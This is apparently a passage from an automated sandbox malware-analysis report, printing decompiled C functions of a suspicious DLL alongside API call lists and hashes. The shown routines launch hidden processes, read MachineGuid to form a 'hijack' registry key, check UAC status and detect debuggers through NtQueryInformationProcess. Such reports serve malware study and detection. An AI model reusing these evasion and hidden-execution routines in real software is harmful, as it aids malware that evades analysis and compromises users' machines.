                                                                                                                                                                    • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                                      • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                      • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                      • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                      • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32 ref: 1001A22B
                                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                    • String ID: %s%s %s %s$0011
                                                                                                                                                                    • API String ID: 3552933064-2132516514
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A1D0(void* __eflags, CHAR* _a4) {
                                                                                                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                    				CHAR* _v24;
                                                                                                                                                                    				struct _STARTUPINFOA _v100;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				E1000CF20(_t27,  &_v100, 0, 0x44);
                                                                                                                                                                    				_v100.cb = 0x44;
                                                                                                                                                                    				_v100.dwFlags = 1;
                                                                                                                                                                    				_v100.wShowWindow = 0;
                                                                                                                                                                    				E1000CF20(_t27,  &_v20, 0, 0x10);
                                                                                                                                                                    				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
                                                                                                                                                                    					CloseHandle(_v20.hThread);
                                                                                                                                                                    					CloseHandle(_v20);
                                                                                                                                                                    					_v24 = 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v24;
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                                    • String ID: D
                                                                                                                                                                    • API String ID: 1151464618-2746444292
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                                    				intOrPtr* _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				intOrPtr* _v36;
                                                                                                                                                                    				intOrPtr* _v40;
                                                                                                                                                                    				intOrPtr* _v44;
                                                                                                                                                                    				intOrPtr* _t105;
                                                                                                                                                                    				void* _t174;
                                                                                                                                                                    				void* _t176;
                                                                                                                                                                    
                                                                                                                                                                    				_t172 = __edi;
                                                                                                                                                                    				_t122 = __ebx;
                                                                                                                                                                    				_v16 = _a4;
                                                                                                                                                                    				_t4 = _v16 + 4; // 0x7d83ec45
                                                                                                                                                                    				_v24 =  *_t4;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v20 =  *_v16 + 0x78;
                                                                                                                                                                    				if( *((intOrPtr*)(_v20 + 4)) != 0) {
                                                                                                                                                                    					_v8 = _v24 +  *_v20;
                                                                                                                                                                    					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                                    						SetLastError(0x7f);
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                                    							if( *(_v8 + 0x18) != 0) {
                                                                                                                                                                    								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
                                                                                                                                                                    									L19:
                                                                                                                                                                    									_t70 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                                    									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                    										_v12 =  *(_v28 + 4) & 0x0000ffff;
                                                                                                                                                                    										L22:
                                                                                                                                                                    										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                                    											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                                    										}
                                                                                                                                                                    										SetLastError(0x7f);
                                                                                                                                                                    										return 0;
                                                                                                                                                                    									}
                                                                                                                                                                    									SetLastError(0x7f);
                                                                                                                                                                    									return 0;
                                                                                                                                                                    								}
                                                                                                                                                                    								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                                    								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                                    								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
                                                                                                                                                                    								_t176 = _t174 + 4;
                                                                                                                                                                    								_v44 = _t105;
                                                                                                                                                                    								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
                                                                                                                                                                    								if(_v44 != 0) {
                                                                                                                                                                    									_v32 = 0;
                                                                                                                                                                    									while(_v32 <  *(_v8 + 0x18)) {
                                                                                                                                                                    										 *_v44 = _v24 +  *_v36;
                                                                                                                                                                    										 *((short*)(_v44 + 4)) =  *_v40;
                                                                                                                                                                    										_v32 = _v32 + 1;
                                                                                                                                                                    										_v36 = _v36 + 4;
                                                                                                                                                                    										_v40 = _v40 + 2;
                                                                                                                                                                    										_v44 = _v44 + 8;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t66 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                                    									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
                                                                                                                                                                    									_t174 = _t176 + 0x10;
                                                                                                                                                                    									goto L19;
                                                                                                                                                                    								}
                                                                                                                                                                    								SetLastError(0xe);
                                                                                                                                                                    								return 0;
                                                                                                                                                                    							}
                                                                                                                                                                    							SetLastError(0x7f);
                                                                                                                                                                    							return 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                                    							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                    							goto L22;
                                                                                                                                                                    						}
                                                                                                                                                                    						SetLastError(0x7f);
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				SetLastError(0x7f);
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                    • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                                    • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                                    • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                    			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				char _v311;
                                                                                                                                                                    				char _v312;
                                                                                                                                                                    				char _v575;
                                                                                                                                                                    				char _v576;
                                                                                                                                                                    				void* _t30;
                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                    				void* _t50;
                                                                                                                                                                    
                                                                                                                                                                    				_t50 = __eflags;
                                                                                                                                                                    				_t41 = __edi;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022ADF);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t43;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v576 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                                    				_v312 = 0;
                                                                                                                                                                    				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                                    				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
                                                                                                                                                                    				GetTempPathA(0x104,  &_v576);
                                                                                                                                                                    				_push(E100011E0( &_a4));
                                                                                                                                                                    				_push(E100011E0( &_v44));
                                                                                                                                                                    				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                                    				E1001A1D0(_t50,  &_v312);
                                                                                                                                                                    				E100011A0( &_v44);
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				_t30 = E100011A0( &_a4);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _t30;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                                      • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                      • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                      • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                      • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32 ref: 1001A22B
                                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                    • String ID: %s%s 200 %s
                                                                                                                                                                    • API String ID: 3552933064-2772210913
                                                                                                                                                                    • Opcode ID: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                                    • Instruction ID: fa445e4306be4de550b1f58f9f77f959fb08a7f600bfac00d2f80f5c48e4b5e6
                                                                                                                                                                    • Opcode Fuzzy Hash: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                                    • Instruction Fuzzy Hash: B01198B6C00208ABE714EB90DC56FDE777CEB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                    			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				char _v275;
                                                                                                                                                                    				char _v276;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t20;
                                                                                                                                                                    				void* _t37;
                                                                                                                                                                    
                                                                                                                                                                    				_t37 = __eflags;
                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                    				_v276 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v275, 0, 0x103);
                                                                                                                                                                    				_v12 = 0x104;
                                                                                                                                                                    				E1001A2F0( &_v276,  &_v12);
                                                                                                                                                                    				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                                    				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                                    				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                                    				_t38 = _v8;
                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                    					return E1000CA30(__ebx, _t28, __esi, _t38);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t20;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                                      • Part of subcall function 1001A2F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                      • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                      • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                    • API String ID: 3138967372-3622423033
                                                                                                                                                                    • Opcode ID: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                                    • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                                    • Opcode Fuzzy Hash: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001D240() {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				int _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				int _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    
                                                                                                                                                                    				_v12 = 4;
                                                                                                                                                                    				_v20 = 4;
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                                    					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
                                                                                                                                                                    						_v16 = 0 | _v24 == 0x00000001;
                                                                                                                                                                    					}
                                                                                                                                                                    					RegCloseKey(_v8);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v16;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                                    Strings
                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                                    • EnableLUA, xrefs: 1001D296
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                                    • API String ID: 3677997916-2194944742
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A2F0(char* _a4, int* _a8) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				int* _v12;
                                                                                                                                                                    
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
                                                                                                                                                                    					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
                                                                                                                                                                    						_v12 = 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					RegCloseKey(_v8);
                                                                                                                                                                    					return _v12;
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001A355
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                    • API String ID: 3677997916-880526231
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                    			E10013389(void* __ebx, void* __esi) {
                                                                                                                                                                    				void* _t1;
                                                                                                                                                                    				long _t5;
                                                                                                                                                                    				void* _t9;
                                                                                                                                                                    				void* _t11;
                                                                                                                                                                    				void* _t15;
                                                                                                                                                                    
                                                                                                                                                                    				_t9 = __ebx;
                                                                                                                                                                    				_t1 = TlsGetValue( *0x10332c6c);
                                                                                                                                                                    				_t16 = _t1;
                                                                                                                                                                    				if(_t1 != 0) {
                                                                                                                                                                    					_push( *0x10332c68);
                                                                                                                                                                    					_t11 =  *(TlsGetValue( *0x10332c6c))();
                                                                                                                                                                    				}
                                                                                                                                                                    				_pop(_t15);
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				_push( *0x10332c68);
                                                                                                                                                                    				 *((intOrPtr*)(E10013034( *0x10333820)))();
                                                                                                                                                                    				_push(_t11);
                                                                                                                                                                    				L10013256(_t9, _t11, _t15, _t16);
                                                                                                                                                                    				_t5 =  *0x10332c6c; // 0x24
                                                                                                                                                                    				if(_t5 != 0xffffffff) {
                                                                                                                                                                    					return TlsSetValue(_t5, 0);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t5;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                                    • TlsSetValue.KERNEL32(00000024,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$__decode_pointer
                                                                                                                                                                    • String ID: tj
                                                                                                                                                                    • API String ID: 3389472636-3491506833
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E10019F00() {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                    				struct HINSTANCE__* _v16;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                    				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                    				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                    				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
                                                                                                                                                                    				return 0 | _v8 != 0x00000001;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                                    • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                    • API String ID: 353374858-801751246
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E10019F50() {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                    				struct HINSTANCE__* _v16;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                    				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                    				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
                                                                                                                                                                    				return 0 | _v8 != 0x00000000;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
